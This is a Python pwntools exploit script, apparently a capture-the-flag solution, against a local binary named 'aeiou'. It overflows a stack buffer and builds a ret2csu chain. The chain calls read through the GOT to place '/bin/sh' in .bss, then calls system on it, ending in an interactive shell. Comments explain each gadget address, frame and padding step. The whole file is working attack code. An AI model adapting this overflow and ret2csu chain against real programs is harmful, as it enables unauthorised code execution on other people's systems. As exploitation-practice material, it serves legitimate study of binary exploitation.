exploit.py

from pwn import *
  
# Spawn the target binary locally and attach pwntools' ELF parser to it.
# Everything below reads symbol/GOT/.bss addresses from this ELF object, so
# the script only makes sense against this exact build of ./aeiou.
p = process("./aeiou")

e = ELF("./aeiou")
# Resolved from the loaded binary's dependencies; not referenced anywhere in
# the visible script, so the chain below does not depend on a libc leak.
l = e.libc


def csu_chain(addr, argv1, argv2, argv3, mode=1):
    """Build one ret2csu stack frame as a raw (Python 2 str) byte string.

    The frame is laid out for the two hard-coded gadgets in this binary:
    six 8-byte values consumed by the pop gadget at ``csu_1`` (presumably
    rbx, rbp, r12, r13, r14, r15 -- confirm in the disassembly), followed by
    the address ``csu_2``, whose register moves and indirect call consume
    them.  Which of ``argv1``/``argv2``/``argv3`` ends up in which argument
    register depends on the exact gadget at ``csu_2``; it is not visible here.

    Args:
        addr: address of a function pointer (a GOT slot in the callers) that
            the csu gadget dereferences and calls.
        argv1, argv2, argv3: the three values staged into argument registers.
        mode: when non-zero, prefix 8 filler bytes; the default is used for
            every frame after the first, presumably to absorb the stack
            adjustment the csu gadget performs before its next pop sequence.

    Returns:
        The frame bytes; ``p64`` output is concatenated as ``str``, so this
        only runs under Python 2 pwntools.

    Note:
        Relies on absolute addresses (``csu_1``/``csu_2`` are fixed
        ``0x40...`` constants), i.e. a non-PIE build.  ``csu_2`` is a
        module-level constant defined elsewhere in the script.
    """
    # Order matters: it is the pop order of the csu_1 gadget, then the
    # address that the final `ret` of that gadget lands on.
    frame = [p64(v) for v in (0, 1, addr, argv3, argv2, argv1, csu_2)]
    prefix = "A" * 8 if mode != 0 else ""
    return prefix + "".join(frame)

# NUL-terminated string that the first chain reads into .bss and the second
# chain passes to system(); len(binsh) (8) is the byte count requested below.
binsh = "/bin/sh\x00"
# Absolute gadget addresses from __libc_csu_init of this exact build (non-PIE,
# hence the fixed 0x40.... values). Rebuilding the binary invalidates them.
csu_1 = 0x4026EA
csu_2 = 0x4026D0
# A lone `ret`; presumably used for stack alignment before the csu chain --
# confirm against the disassembly.
ret = 0x400b29

# 0x1018 bytes of filler reach the saved return address (buffer size plus
# saved rbp, inferred from the constant -- not visible in this script).
payload = "A"*0x1018
payload += p64(ret)
payload += p64(csu_1)
# Frame 1 (mode=0, no 8-byte prefix): call read through its GOT slot so that
# len(binsh) bytes are written to .bss (the string sent at the end).
payload += csu_chain(e.got['read'],0,e.bss(),len(binsh),0)
# Frame 2 (default mode=1): call system through its GOT slot with the .bss
# address as its argument.
payload += csu_chain(e.got['system'],e.bss(),0,0)
# Despite the name this is NOT a stack-canary value -- it is plain filler that
# pads the request to exactly 6224 bytes. If payload ever exceeds 6224 bytes
# the multiplier goes negative and this silently becomes "" rather than
# failing, so the total length should be asserted before sending.
canary = "A"*(6224-len(payload))
payload += canary

# Menu option 3, then the announced length, then the payload itself; the
# trailing sendline feeds the read() staged by frame 1.
p.sendlineafter(">>","3")
p.sendlineafter("number!\n",str(len(payload)))
p.sendline(payload)
p.sendline(binsh)
p.interactive()
